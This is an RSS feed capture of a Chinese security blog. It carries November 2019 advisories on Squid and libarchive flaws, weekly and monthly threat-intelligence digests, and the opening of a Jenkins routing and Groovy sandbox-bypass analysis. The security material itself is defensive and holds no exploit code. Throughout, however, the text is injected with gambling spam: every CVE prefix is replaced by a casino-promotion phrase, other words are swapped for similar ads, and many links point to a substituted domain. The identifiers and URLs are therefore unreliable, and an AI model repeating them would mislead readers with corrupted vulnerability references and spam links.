绿盟科技博客 - 2017最新注册送体验 http://blog.cholochitro.com Fri, 08 Nov 2019 02:19:55 +0800 zh-CN hourly 1 https://wordpress.org/?v=5.2.4 【威胁通告】Squid多个高危漏洞预警通告 http://blog.cholochitro.com/2018年送彩金网站大全2019-12526-2018年送彩金网站大全2019-18679-2018年送彩金网站大全2019-18678/ http://blog.nsfocus.net/2018年送彩金网站大全2019-12526-2018年送彩金网站大全2019-18679-2018年送彩金网站大全2019-18678/#respond Fri, 08 Nov 2019 02:18:45 +0000 http://blog.cholochitro.com/?p=16173 当地时间11月5日,Squid 官方发布安全通告修复了多个漏洞。危害等级:高,攻击者利用漏洞,可造成任意代码执行、拒绝服务、信息泄露等。

一.  漏洞概述

当地时间11月5日,Squid 官方发布安全通告修复了多个漏洞,其中包含一个可导致代码执行的高危缓冲区溢出漏洞(2018年送彩金网站大全2019-12526),一个信息泄露漏洞(2018年送彩金网站大全2019-18679)及HTTP请求拆分问题(2018年送彩金网站大全2019-18678)。

Squid是一种流行的开源Internet代理和Web缓存应用程序。它可用于减少Web服务器上的带宽使用和需求,过滤网络流量,并通过本地缓存常用资源来加速Web访问。Squid支持各种网络协议,包括HTTP,FTP和Gopher。Squid支持代理转发,内部网络上的客户端通过Squid连接到外部网络上的服务器,反向代理外部网络上的客户端通过Squid连接到内部网络上的服务器。

2018年送彩金网站大全2019-12526:由于不正确的缓冲区管理,该漏洞允许远程攻击者向堆上写入大量任意数据,可能导致任意代码执行。在具有内存访问保护的系统上,则可能导致Squid进程异常终止,对所有使用代理的客户端造成拒绝服务。

2018年送彩金网站大全2019-18679:由于不正确的数据管理,使得 Squid在处理HTTP摘要认证时可能发生信息泄露,泄露的信息将减弱ASLR保护,并可能帮助攻击者实行远程代码执行攻击。

2018年送彩金网站大全2019-18678:由于错误的消息解析,使得 Squid 容易出现 HTTP 请求拆分问题,风险及影响相对较小。

参考链接:

http://www.squid-cache.org/Advisories/SQUID-2019_11.txt

http://www.squid-cache.org/Advisories/SQUID-2019_10.txt

http://www.squid-cache.org/Advisories/SQUID-2019_7.txt

二、影响范围

影响范围

  • Squid 3.0 <= 3.5.28
  • Squid 4.x <= 4.8

不受影响版本

  • Squid = 4.9

三、漏洞检测

人工检测

用户可使用命令squid –v查看当前安装的版本

若当前版本在受影响范围内,则可能存在风险。

四、漏洞防护

官方升级

目前官方已在最新版本中修复了以上漏洞,请受影响的用户尽快升级到Squid 4.9。

官方链接:http://www.squid-cache.org/Versions/

安装命令如下:

wget http://www.squid-cache.org/Versions/v4/squid-4.9.tar.gz
tar -zxvf squid-4.9.tar.gz
cd squid-4.9 ./configure (编译参数可根据需要自定义)
make && make install

安装成功截图如下:

其他防护措施

若相关用户暂时无法进行升级,也可采用以下措施对相应漏洞进行防护。

1、安装漏洞对应的补丁

漏洞编号 补丁下载链接
2018年送彩金网站大全2019-12526 http://www.squid-cache.org/Versions/v4/changesets/squid-4-7aa0184a720fd216191474e079f4fe87de7c4f5a.patch
2018年送彩金网站大全2019-18678 http://www.squid-cache.org/Versions/v4/changesets/squid-4-671ba97abe929156dc4c717ee52ad22fba0f7443.patch
2018年送彩金网站大全2019-18679 http://www.squid-cache.org/Versions/v4/changesets/squid-4-671ba97abe929156dc4c717ee52ad22fba0f7443.patch

注:若使用的是Squid的预打包版本,请与软件包供应商联系进行确认。

2、针对漏洞采取防护措施

2018年送彩金网站大全2019-12526:

拒绝urn:由所有客户端所代理的协议URI

acl URN proto URN

http_access deny URN

2018年送彩金网站大全2019-18679:

(1)从配置文件squid.conf中删除“auth_param digest …”设置。

(2)在编译Squid 时添加 –disable-auth-basic 参数

声明

本安全2018博彩游戏网站大全仅用来描述可能存在的安全问题,绿盟科技不为此安全2018博彩游戏网站大全提供任何保证或承诺。由于传播、利用此安全2018博彩游戏网站大全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全2018博彩游戏网站大全作者不为此承担任何责任。

绿盟科技拥有对此安全2018博彩游戏网站大全的修改和解释权。如欲转载或传播此安全2018博彩游戏网站大全,必须保证此安全2018博彩游戏网站大全的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全2018博彩游戏网站大全内容,不得以任何方式将其用于商业目的。

关于绿盟科技                                                

北京神州绿盟信息安全科技股份有限公司(简称绿盟科技)成立于2000年4月,总部位于北京。在国内外设有30多个分支机构,为政府、运营商、金融、能源、互联网以及教育、医疗等行业用户,提供具有核心竞争力的安全产品及解决方案,帮助客户实现业务的安全顺畅运行。

基于多年的安全攻防2017最新注册送体验,绿盟科技在网络及终端安全、互联网基础安全、合规及安全管理等领域,为客户提供入侵检测/防护、抗拒绝服务攻击、远程安全评估以及Web安全防护等产品以及专业安全服务。

北京神州绿盟信息安全科技股份有限公司于2014年1月29日起在深圳证券交易所创业板上市,股票简称:绿盟科技,股票代码:300369。

文章来源:绿盟科技博客
]]>
http://blog.cholochitro.com/2018年送彩金网站大全2019-12526-2018年送彩金网站大全2019-18679-2018年送彩金网站大全2019-18678/feed/ 0
【威胁通告】开源压缩库Libarchive代码执行漏洞(2018年送彩金网站大全2019-18408) http://blog.cholochitro.com/2018年送彩金网站大全2019-18408/ http://blog.nsfocus.net/2018年送彩金网站大全2019-18408/#respond Wed, 06 Nov 2019 06:37:24 +0000 http://blog.nsfocus.net/?p=16170 在某些ARCHIVE_FAILED 情况下, 3.4.0 版本前libarchive 的 archive_read_support_format_rar.c中存在UAF (释放后使用)漏洞。攻击者利用精心构造的压缩文件,当受影响用户使用Libarchive或者包含Libarchive的软件读取这些恶意压缩文件时,可能会被执行代码。

综述

近日,在Debian,Ubuntu,Gentoo等发行版的安全更新中披露了一个默认包含的库Libarchive中存在的代码执行漏洞(2018年送彩金网站大全2019-18408)。

Libarchive是一个开源压缩库,因其能够访问大量压缩文件格式而被广泛使用,默认包含在 Debian,Ubuntu,Gentoo,Arch Linux,FreeBSD和NetBSD发行版中。一些常用的命令行工具如 tar, cpio, zcat 等也使用到 libarchive。

在某些ARCHIVE_FAILED 情况下, 3.4.0 版本前libarchive 的 archive_read_support_format_rar.c中存在UAF (释放后使用)漏洞。攻击者利用精心构造的压缩文件,当受影响用户使用Libarchive或者包含Libarchive的软件读取这些恶意压缩文件时,可能会被执行代码。

上周,几个Linux和FreeBSD发行版已发布相关更新修复了此漏洞。另外值得庆幸的是,虽然Libarchive 也被包含在 Mac OS X 和Windows 10 中,但是此次漏洞并未影响到这两种操作系统。

参考链接:

https://www.zdnet.com/article/libarchive-vulnerability-can-lead-to-code-execution-on-linux-freebsd-netbsd/#ftag=RSSbaffb68

受影响产品版本

  • Libarchive Version < 3.4.0

不受影响产品版本

  • Libarchive Version == 3.4.0(最新)

解决方案

Libarchive 团队已提供修复了该漏洞的最新版本,建议受影响用户尽快前往以下链接下载并更新。

https://github.com/libarchive/libarchive/releases/tag/v3.4.0

各发行版安全更新信息详见:

声 明

本安全2018博彩游戏网站大全仅用来描述可能存在的安全问题,绿盟科技不为此安全2018博彩游戏网站大全提供任何保证或承诺。由于传播、利用此安全2018博彩游戏网站大全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全2018博彩游戏网站大全作者不为此承担任何责任。绿盟科技拥有对此安全2018博彩游戏网站大全的修改和解释权。如欲转载或传播此安全2018博彩游戏网站大全,必须保证此安全2018博彩游戏网站大全的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全2018博彩游戏网站大全内容,不得以任何方式将其用于商业目的。

关于绿盟科技

北京神州绿盟信息安全科技股份有限公司(简称绿盟科技)成立于2000年4月,总部位于北京。在国内外设有30多个分支机构,为政府、运营商、金融、能源、互联网以及教育、医疗等行业用户,提供具有核心竞争力的安全产品及解决方案,帮助客户实现业务的安全顺畅运行。

基于多年的安全攻防2017最新注册送体验,绿盟科技在网络及终端安全、互联网基础安全、合规及安全管理等领域,为客户提供入侵检测/防护、抗拒绝服务攻击、远程安全评估以及Web安全防护等产品以及专业安全服务。

北京神州绿盟信息安全科技股份有限公司于2014年1月29日起在深圳证券交易所创业板上市,股票简称:绿盟科技,股票代码:300369。

文章来源:绿盟科技博客
]]>
http://blog.cholochitro.com/2018年送彩金网站大全2019-18408/feed/ 0
绿盟科技互联网安全威胁周报NSFOCUS-2019-44 http://blog.cholochitro.com/nsfocus-2019-44/ http://blog.nsfocus.net/nsfocus-2019-44/#respond Mon, 04 Nov 2019 10:04:51 +0000 http://blog.cholochitro.com/?p=16164 最近一周CVE2018博彩游戏网站大全总数与前期相比有明显下降。

一. 互联网安全威胁态势

1.1 CVE

最近一周CVE2018博彩游戏网站大全总数与前期相比有明显下降。

1.2 威胁信息回顾

  • 标题:Apache Solr Velocity远程代码执行漏洞
    • 时间:2019-10-31
    • 简介:2019年10月30日,@_S00pY公开了Apache Solr 远程代码执行漏洞的利用方式,攻击者可通过Velocity模板实现远程代码执行。经测试,该漏洞可以成功触发,且官方未发布安全补丁。此漏洞的触发需要两步完成,首先攻击者需通过config API将params.resource.loader.enabled配置项修改为true;再通过发送恶意velocity模板完成漏洞触发。
    • 链接:http://blog.cholochitro.com/apache-solr2019-10-31/
  • 标题:针对体育组织和反兴奋剂机构的新网络攻击
    • 时间:2019-10-28
    • 简介:Microsoft威胁情报中心最近追踪到了重要的网络攻击,该网络攻击来自Strontium的组织,针对全球的反兴奋剂机构和体育组织。Strontium,也被称为FancyBear、STRONTIUM、Sednit、Sofacy、Pawn Storm、Threat Group-4127等,是一个归属于俄罗斯政府的威胁组织,至少从2004年活跃至今。
    • 链接:https://blogs.microsoft.com/on-the-issues/2019/10/28/cyberattacks-sporting-anti-doping/
  • 标题:Emotet银行木马再次通过大量群发钓鱼邮件攻击企业
    • 时间:2019-10-30
    • 简介:2017最新注册送体验人员发现多家企业收到钓鱼邮件攻击,钓鱼邮件附件是一个Office文档,运行后宏病毒会下载Emotet银行木马执行。数据显示近期Emotet木马针对国内的攻击呈明显上升趋势,从事进出口贸易的企业是Emotet银行木马的主要目标。
    • 链接:https://s.tencent.com/research/report/832.html
  • 标题:恶意软件Xhelper半年内感染4.5万台设备
    • 时间:2019-10-28
    • 简介:恶意软件Xhelper在过去6个月持续感染4.5万台设备,主要针对印度、美国和俄罗斯等国家的用户。Xhelper应用程序可以向用户隐藏自身,下载其他恶意应用程序并显示;并具有永久性,用户在卸载后可以重新安装自身,并设计为不显示在系统启动器上而保持隐藏状态。
    • 链接:https://www.symantec.com/blogs/threat-intelligence/xhelper-android-malware
  • 标题:网络犯罪份子冒充Fancy Bear组织进行DDoS攻击
    • 时间:2019-10-29
    • 简介:冒充俄罗斯APT组织Fancy Bear的网络犯罪分子一直在对金融行业的国际公司发起DDoS攻击,并要求赎金,主要针对位于新加坡、南非的金融公司。
    • 链接:https://threatpost.com/cybercriminals-impersonate-russian-apt-fancy-bear-to-launch-ddos-attacks/149578/
  • 标题:Group123组织针对外贸人员的攻击活动
    • 时间:2019-10-28
    • 简介:Group123(又名APT37、Reaper、ScarCruft和TEMP.Reaper)是一个疑似来自朝鲜的威胁组织,至少从2012年开始活跃,主要针对韩国、日本、越南、俄罗斯、中国、印度、科威特等地区。近期发现Group123组织针对中国和韩国外贸公司、外企高管等相关人士的鱼叉式网络钓鱼攻击活动。
    • 链接:https://s.tencent.com/research/report/831.html
  • 标题:UniCredit称300万客户个人数据遭泄露
    • 时间:2019-10-28
    • 简介:意大利全球银行和金融服务巨头UniCredit宣布,其网络安全团队已发现“数据泄露事件”,该事件导致其300万客户的个人数据遭到泄露。UniCredit在许多欧洲国家地区包括俄罗斯、土耳其、塞尔维亚和波斯尼亚和黑塞哥维那设有子公司。这次最新的数据泄露事件涉及约300万意大利客户的个人信息泄露,包含其名称、城市、电话号码和电子邮件地址等。
    • 链接:https://www.helpnetsecurity.com/2019/10/28/unicredit-data-compromised/
  • 标题:Raccoon信息窃取软件已在全球感染超过10万用户
    • 时间:2019-10-28
    • 简介:Raccoon恶意软件(又名Mohazo和Racealer)自2019年4月以来,一直在暗网中被积极售卖。Raccoon核心是一种信息窃取程序,通常在Fallout和RIG Exploit套件中看到,攻击者利用它可窃取信用卡信息、加密货币钱包、与浏览器相关的数据和邮件客户端等数据,已在全球范围内感染了超过10万名用户,涉及北美、欧洲和亚洲地区。
    • 链接:https://securityaffairs.co/wordpress/93028/malware/raccoon-info-stealer-maas.html
  • 标题:APT28
    • 简介:APT28组织,也被称为Sofacy、Pawn Storm、Fancy Bear、STRONTIUM、Threat Group-4127和Sednit,是与俄罗斯政府有联系的网络间谍组织。该组织至少自2004年以来一直在运营,其目标主要针对是政府、军队和安全组织。
    • 链接:https://nti.nsfocus.com/actor?query=0c10100c5cce8da203150
  • 标题:Group123
    • 简介:Group123(又称Group123、Starcruft、Reaper等)至少从2012年开始一直活跃的朝鲜网络间谍组织,该组织主要针对韩国、日本、越南和中东等地区,以及更广泛的行业垂直领域,包括化学、电子、制造业、航空航天、汽车和医疗保健等实体。
    • 链接:https://nti.nsfocus.com/actor?query=0c1010095cc8071b03150

文章来源:绿盟科技博客
]]>
http://blog.cholochitro.com/nsfocus-2019-44/feed/ 0
网络安全威胁月报NSFOCUS-2019-10 http://blog.cholochitro.com/nsfocus-2019-10/ http://blog.nsfocus.net/nsfocus-2019-10/#respond Fri, 01 Nov 2019 08:48:12 +0000 http://blog.cholochitro.com/?p=16152 2019 年 10 月绿盟科技安全漏洞库共收录 393 漏洞, 其中高危漏洞 184 个,微软高危漏洞 28 个。绿盟科技收录高危漏洞数量与前期相比有明显上升。

一. 2019 年10 月数据

1.1 高危漏洞发展趋势

2019 年 10 月绿盟科技安全漏洞库共收录 393 漏洞, 其中高危漏洞 184 个,微软高危漏洞 28 个。绿盟科技收录高危漏洞数量与前期相比有明显上升。

1.2 互联网安全事件

标题:Weblogic 高危漏洞
时间:2019-10-17
摘要:近日,Oracle 发布了 10 月份关键补丁更新,其中修复了 Weblogic 的 2 个高危漏洞CVE2019-2890,2018年送彩金网站大全2019-2891。2018年送彩金网站大全2019-2890 漏洞允许攻击者在拥有一定权限时通过构造 恶意的 T3 协议请求,从而绕过 Weblogic 的反序列化黑名单并接管受影响的服务器;CVE2019-2891 漏洞允许攻击者在未授权情况下通过构造恶意的 HTTP 请求并发送给 Console 组 件,从而接管受影响的服务器。
链接:http://blog.cholochitro.com/2018年送彩金网站大全2019-2890-2018年送彩金网站大全2019-2891/


标题:与伊朗有联系的威胁组织瞄准 2020 年美国总统大选
时间:2019-10-06
摘要:微软的威胁情报中心(MSTIC)透露,一个与伊朗有关联的 APT 组织 Phosphorus(又名 APT35、 Charming Kitten、Newscaster 和 Ajax Security)试图访美国现任和前政府官员、记者、以及参加 2020 年美国总统大选的个人的电子邮箱。
链接:https://threatpost.com/iran-linked-hackers-target-trump-2020-campaignmicrosoft-says/148931/


标题:Splinter 新 APT 攻击工具透析
时间:2019-10-28
摘要:近期,绿盟科技伏影实验室威胁追踪系统监测到一个新 APT 攻击事件。此次事件起源于我们截获的一封邮件所含附件,该邮件命名为“指示细节”,内附文档《指示细节.doc》,该文档使用 2018年送彩金网站大全2018-0802 漏洞进行攻击。经过持续的跟踪与监控,我们最终捕获到该事件背后组织存放恶意文件的托管服务器地址,并获取到了攻击武器库中所有的文件。在与历史数据进行对比后,我们发现该组织近期更新了多个攻击工具,且对部分工具进行了功能细分。此次获取的工具包括:下载器,键盘记录器,上传 agent 工具,独立的命令模块以及远控工具。在其中我们发现了一个从未在该组织基础设施中发现过的 RAT 工具,并将其命名为 Splinter。
链接:http://blog.nsfocus.net/splinters-new-apt-attack-tool-dialysis/

标题:Cisco Aironet Access Points 未授权访问漏洞
时间:2019-10-17
摘要:当地时间 10 月 17 日,Cisco 发布安全通告称修复了一个 Aironet Access Points(APs)的未授权访问漏洞。该漏洞源于没有对特定的 URL 进行过滤,攻击者可以通过构造恶意的 URL 并且发送给受影响的 AP 来触发该漏洞,从而获取到设备的访问权限。攻击者之后可以修改 AP 的多项配置数据,并造成拒绝服务攻击。
链接:http://blog.nsfocus.net/cisco-aironet-access-points-2019-10-17/

标题:Joomla! 内容管理系统远程代码执行漏洞
时间:2019-10-08
摘要:近日,国外安全2017最新注册送体验人员 Alessandro Groppo 在博客中公布了一个存在于内容管理系统 Joomla! 早期版本中的远程代码执行漏洞。该漏洞是2017最新注册送体验人员在 Joomla! CMS 3.0.0.版本到 3.4.6 版本(2012 年 9 月至 2015 年 12 月发布)中发现的一处 PHP 对象注入导致的远程代码执行,漏洞验证程序已发布。存在该漏洞的 Joomla! 版本虽然不是很多,但是由于利用完全独立于环境,所以使其影响范围有所扩大。
链接:http://blog.nsfocus.net/joomla-content-management-system-remote-codeexecution-vulnerability/

标题: Winnti 组织针对 Microsoft SQL Server 的后门 skip-2.0
时间:2019-09-26
摘要:最近,2017最新注册送体验人员发现了针对 Microsoft SQL(MSSQL)的后门程序 skip-2.0,使攻击者能够在威胁活动中保持立足点。skip-2.0 后门与 Winnti 使用的另一种工具 PortReuse 后门有很多相似之处,主要针对 MSSQL Server 11 和 12。Winnti 是一个与中国有关的威胁组织,至少从 2010年开始活跃,主要针对视频游戏和软件行业,并以供应链攻击而闻名。
链接:https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoftsql-server-backdoor/

标题:泛微 e-cology OA 系统 SQL 注入漏洞
时间:2019-10-11
摘要:2019 年 10 月 10 日,国家信息安全漏洞共享平台(CNVD)公布了泛微 e-cology OA 系统 存在 SQL 注入漏洞(CNVD-2019-34241)。泛微 e-cologyOA 系统的 WorkflowCenterTreeData接口在使用 Oracle 数据库时,由于内置的 SQL 语句拼接不严,导致泛 微 e-cology OA 系统存在SQL 注入漏洞。攻击者利用该漏洞,可在未授权的情况下,远程发送精心构造的 SQL 语句,从而获取数据库敏感信息。
链接:http://blog.nsfocus.net/cnvd-2019-34241ns-2019-0043/

标题:TA505 组织利用 Get2 下载器分发 SDBbot 木马
时间:2019-10-16
摘要:TA505 是一个有经济动机的威胁组织,至少从 2014 年开始活跃,该组织以经常变化的恶 意软件和推动全球趋势的恶意软件分发而闻名。近期发现 TA505 组织针对希腊和德国的攻击活 动,攻击中利用钓鱼邮件针对金融机构,新的 Microsoft Office 宏专门用于 Get2 下载器,Get2 下载了新的远程访问木马 SDBbot。
链接:https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-newsdbbot-remote-acces s-trojan-get2-downloader

标题:Kibana 远程代码执行漏洞
时间:2019-10-19
摘要:2019 年 2 月官方发布2018博彩游戏网站大全称 Kibana 存在远程代码执行漏洞,5.6.15 和 6.6.1 之前的 Kibana 版本在 Timelion 可视化工具中存在功能缺陷,导致攻击者可在服务器上利用 Kibana 执 行任意代码,目前 PoC 已公布,请相关用户及时进行自查和防护。
链接:http://blog.nsfocus.net/2018年送彩金网站大全2019-7609/

标题:php-fpm 远程代码执行漏洞 时间:2019-10-24
摘要:近日,国外安全2017最新注册送体验员公布了一个存在于 php-fpm 中的漏洞(2018年送彩金网站大全2019-11043),在 某些特定 Nginx 配置中,该漏洞可能会导致远程代码执行。
链接:http://blog.nsfocus.net/2018年送彩金网站大全2019-11043/


标题:Redaman 木马的 C&C 服务器隐藏在比特币区块链中
时间:2019-10-17
摘要:Redaman 是通过网络钓鱼活动分发的一种银行恶意软件,主要针对俄语使用者,首次出 现在 2015 年。近期,发现 Redaman 木马的新版本,该新版本将 C&C 服务器 IP 地址隐藏在比特 币区块链中。
链接:https://research.checkpoint.com/ponys-cc-servers-hidden-inside-the-bitcoinblockchain/

(来源:绿盟科技威胁情报中心)

1.3 绿盟科技漏洞库十大漏洞

声明:本十大安全漏洞由 NSFOCUS(绿盟科技)安全小组 security@nsfocus.com根据安全漏洞的严重程度、利用难易程度、影响范围等因素综合评出,仅供参考。

  1. 2019-10-18 Adobe Acrobat 和 Reader 释放后重利用任意代码执行漏洞
    NSFOCUS ID: 44739
    http://www.nsfocus.net/vulndb/44739
    综述:Adobe Acrobat 是一套 PDF 文件编辑和转换工具。Reader 是一套 PDF 文档阅读软件。 Adobe Acrobat 和 Acrobat Reader 中存在释放后重利用漏洞,攻击者可利用该漏洞执行任意代码。
  2. 2019-10-14 Microsoft Win32k 特权提升漏洞
    NSFOCUS ID: 44567
    http://www.nsfocus.net/vulndb/44567
    综述:Microsoft Windows 是一套个人设备使用的操作系统。当 Windows 内核模式驱动程序未能正确处理内存中的对象时,Windows 中存在特权提升漏洞。
  3. 2019-10-08 Foxit Reader V8 JavaScript 引擎任意代码执行漏洞
    NSFOCUS ID: 44551
    http://www.nsfocus.net/vulndb/44551
    综述:Foxit Reader 是一款 PDF 文档阅读器。V8 是其中的一个开源 JavaScript 引擎。Foxit Reader 9.4.1.16828 版本,在 V8 JavaScript 引擎实现中存在内存破坏漏洞。
  4. 2019-10-21 Oracle Java SE/Java SE Embedded 组件安全漏洞(2018年送彩金网站大全2019-2973) NSFOCUS ID: 44802
    http://www.cholochitro.com/vulndb/44802
    综述:Oracle Java SE 是一款用于开发和部署桌面、服务器以及嵌入设备和实时环境中的 Java应用程序。Oracle Java SE 和 Java SE Embedded 中,JAXP 组件在实现中存在安全漏洞。
  5. 2019-09-29 Apple Xcode otool 组件任意代码执行漏洞(2018年送彩金网站大全2019-8738)
    NSFOCUS ID: 44526
    http://www.nsfocus.net/vulndb/44526
    综述:Apple Xcode 是一套向开发人员提供的集成开发环境,它主要用于开发Mac OS X 和 iOS的应用程序。otool 是其中的一个用于 Mac OS X 应用程序中的反编译工具。Apple Xcode 11.0之前版本,otool 组件存在安全漏洞。
  6. 2019-10-21 Oracle MySQL Server 产品安全漏洞
    NSFOCUS ID: 44836
    http://www.nsfocus.net/vulndb/44836
    综述:Oracle MySQL 是一套开源的关系数据库管理系统。MySQL Workbench 是其中的一个专为 MySQL 设计的具有数据库建模功能的组件。Oracle MySQL Server 产品在 Server: Compiling (cURL) 组件中存在安全漏洞。
  7. 2019-09-29 Apple iOS Face ID 组件身份验证漏洞(2018年送彩金网站大全2019-8760)
    NSFOCUS ID: 44519
    http://www.nsfocus.net/vulndb/44519
    综述:Apple iOS 是一套为移动设备所开发的操作系统。Face ID 是其中的一个面部身份识别组件。Apple iOS 13 之前版本,Face ID 组件存在安全漏洞。
  8. 2019-10-09 Siemens SIMATIC IT UADM 硬编码密钥漏洞
    NSFOCUS ID: 44556
    http://www.nsfocus.net/vulndb/44556
    综述:Siemens SIMATIC IT UADM 是 SIMATIC IT 制造执行系统的一部分。SIMATIC IT UADM 1.3 之前版本,在实现上存在硬编码密钥漏洞。
  9. 2019-10-10 Joomla!内容管理系统远程代码执行漏洞
    NSFOCUS ID: 44557
    http://www.nsfocus.net/vulndb/44557
    综述:Joomla!是一套使用 PHP 和 MySQL 开发的开源、跨平台的内容管理系统(CMS)。Joomla!CMS 3.0.0 版本到 3.4.6 版本(2012 年 9 月至 2015 年 12 月发布)中发现的一处 PHP 对象注入导致的远程代码执行。
  10. 2019-10-23 Schneider Electric Proclima 搜索路径元素任意代码执行漏洞
    NSFOCUS ID: 44845
    http://www.nsfocus.net/vulndb/44845
    综述:ProClima 是构建及自动化控制产品。ProClima 8.0.0 之前版本,不受控制的搜索路径元素漏洞可能允许与软件安装内任何驻留 DLL 相同名称的恶意 DLL 文件执行任意代码。

二. 博文精选

三. 安全会议

安全会议是从近期召开的若干信息安全会议中选出,仅供参考。

black hat EUROPE

时间:DECEMBER 2-5, 2019
简介:Black Hat provides attendees with the latest in research, development, and trends in Information Security. Here the brightest professionals and researchers in the industry come together for a total of four days—two or four days of deeply technical hands-on Trainings, followed by two days of the latest research and vulnerability disclosures in the Briefings.

网址:https://www.blackhat.com/eu-19/

DeepSec

时间:November 26–29, 2019
简介:An in-depth conference on information security held in Europe, DeepSec brings together the most renowned security professionals from myriad sectors including government, academia, and industry as well as the underground hacking community. A non-product, non-vendor-biased conference, DeepSec prides itself on neutrality, considering all discussions, talks, and workshops on merit, innovation, and value to the community alone without preference for specific companies or individuals.
网址:https://deepsec.net/

文章来源:绿盟科技博客
]]>
http://blog.cholochitro.com/nsfocus-2019-10/feed/ 0
Jenkins 路由解析及沙箱绕过漏洞分析报告(上) http://blog.cholochitro.com/jenkins-routing-resolution-and-sandbox-bypass-vulnerability-analysis-report/ http://blog.nsfocus.net/jenkins-routing-resolution-and-sandbox-bypass-vulnerability-analysis-report/#respond Fri, 01 Nov 2019 06:52:49 +0000 http://blog.cholochitro.com/?p=16119 本报告主要2017最新注册送体验Jenkins的路由解析机制和Groovy沙箱绕过带来的安全问题,梳理Jenkins官方2018-2019年以来涉及沙箱绕过的安全更新,探讨Java沙箱在Java应用中的安全性。由于篇幅较长,分为上下两篇发表,文中疏漏之处还请批评指正。

简介

本报告主要2017最新注册送体验Jenkins的路由解析机制和Groovy沙箱绕过带来的安全问题,梳理Jenkins官方2018-2019年以来涉及沙箱绕过的安全更新,探讨Java沙箱在Java应用中的安全性。由于篇幅较长,分为上下两篇发表,文中疏漏之处还请批评指正。

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。Jenkins的目的是持续、自动化地构建/测试软件项目以及监控软件开发流程,快速问题定位及处理,提升开发效率。

Script Security插件是Jenkins的一个安全插件,可以集成到Jenkins各种功能插件中。它主要支持两个相关系统:脚本批准和Groovy沙箱,分别用来管控脚本是否允许执行以及将脚本限制在安全环境下执行,避免带来不可控风险。

环境搭建

1、下载相应版本的war包

地址:https://updates.jenkins-ci.org/download/war/

2、设置环境变量JENKINS_HOME

set JENKINS_HOME=D:\Jenkins\jenkins_2.137

3、加上调试选项并运行

java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -jar jenkins_2.137.war –httpPort=8082

4、安装插件

国内镜像地址:https://mirrors.tuna.tsinghua.edu.cn/jenkins/updates/update-center.json

Jenkins在安装过程中会自动下载部分插件的最新版,这部分可以先跳过,再在后台上传特定版本的插件(.hpi文件)进行安装,然后重启Jenkins完成安装

动态路由机制

首先从WEB-INF/web.xml入手看看Jenkins如何处理路由,可以看到所有请求都交给org.kohsuke.stapler.Stapler,具体是由Stapler:service()方法来处理

在service方法中主要调用的是invoke方法,两处调用的区别是invoke的第3和第4个参数不同,分别是根节点root和url路径,在调用之前判断了url路径,如果是/$stapler/bound/开头,则把根节点设置为boundObjectTable,否则通过this.webApp.getApp()把根节点设置为hudson.model.Hudson

跟进invoke方法

调用的是Stapler#tryInvoke()方法,tryInvoke()方法中对node类型(也就是一开始的root)进行了判断,按先后顺序分别处理三种情况

  • StaplerProxy
  • StaplerOverridable
  • StaplerFallback

这三种情况的具体区别可以参考Jenkins关于路由请求的文档

这里我们关注中间获取metaClass和调用dispatch的过程

通过传入/securityRealm/user/admin/动态调试来跟踪理解

初始化metaClass

WebApp中会缓存一个classMap存放MetaClass,无对应缓存则通过

mc = new MetaClass(this, c);

进行初始化,这个过程发生在Jenkins刚启动没有缓存时,当建立缓存后则直接从classMap获取相应的MetaClass

MetaClass mc = (MetaClass)this.classMap.get(c);

 在MetaClass的构造方法中,会再次调用其父类的getMetaClass()方法,直到父类为空为止

而此时的kclass为一开始传入的hudson.model.Hudson,Hudson继承关系如下图

因此getMetaClass一直调用到class java.lang.Object,然后进行buildDispatchers()方法并层层返回,因此整个初始化metaClass的过程是一个不断寻找继承树并递归调用buildDispatchers的过程,而buildDispatchers的功能就是提取该类中的所有函数信息存储在MetaClass.dispatchers中,作为后续与url的映射关系

buildDispatchers()方法按顺序调用如下:

  • this.registerDoToken(node)
    • do(…)
  • node.methods.prefix(“js”).iterator()
    • js(…)
  • node.methods.annotated(JavaScriptMethod.class).iterator()
    • @JavaScriptMethod annotation
  • node.methods.prefix(“get”)
    • get()
    • get(String)
    • get(Int)
    • get(Long)
  • getMethods.signature(new Class[]{StaplerRequest.class}).iterator()
    • get(StaplerRequest)
  • getMethods.signatureStartsWith(new Class[]{String.class}).name(“getDynamic”).iterator()
    • getDynamic(…)
  • node.methods.name(“doDynamic”).iterator()
    • doDynamic(…)

这相当于规定了一个函数命名规则,只要符合这个规则的方法都能被访问到。

注意此过程中,大部分dispatchers添加的都是NameBasedDispatcher对象,除了如下几类:

  • DirectoryishDispatcher (url路径相关,如/、?、../等)
  • HttpDeletableDispatcher (DELETE方法)
  • IndexDispatcher (doIndex(…))
  • Dispatcher (getDynamic(…) doDynamic(…))

其中js<token>(…)对应的JavaScriptProxyMethodDispatcher继承自NameBasedDispatcher

hudson.model.Hudson经过递归buildDispatchers,缓存下的dispatchers有220个,根据上面的注意点,其中大部分方法会调用到NameBasedDispatcher#dispatch()

递归解析路由

回到org.kohsuke.stapler.Stapler#tryInvoke(),路径/securityRealm/对应的是hudson.security.SecurityRealm jenkins.model.Jenkins.getSecurityRealm(),同样也会调用到NameBasedDispatcher#dispatch()

接下来可以看到ff.invoke()返回一个hudson.security.HudsonPrivateSecurityRealm对象,然后重新调用org.kohsuke.stapler.Stapler#invoke(),这也是一个递归的过程。此时HudsonPrivateSecurityRealm返回的dispatchers有30个,在Stapler#tryInvoke()中进行循环调用,在每个dispatchers动态生成的dispatch方法中,会根据解析到的url路径与当前的dispatchers进行对比,不一致直接返回false,同时还会判断是否存在下一层路由,如果存在则进入doDispatch

比如此时解析到的url为/user/,则只有hudson.security.HudsonPrivateSecurityRealm.getUser(String)方法进入下一步doDispatch

当传入一个不存在的url,tryInvoke会返回false,抛出404,也就不继续往下解析了

经过上面递归的tryInvoke过程,Jenkins才完成路由解析,调用过程的流程图如下

动态路由绕过

  • 2018博彩游戏网站大全:https://jenkins.io/security/advisory/2018-12-05/#SECURITY-595
  • CVE:2018年送彩金网站大全2018-1000861
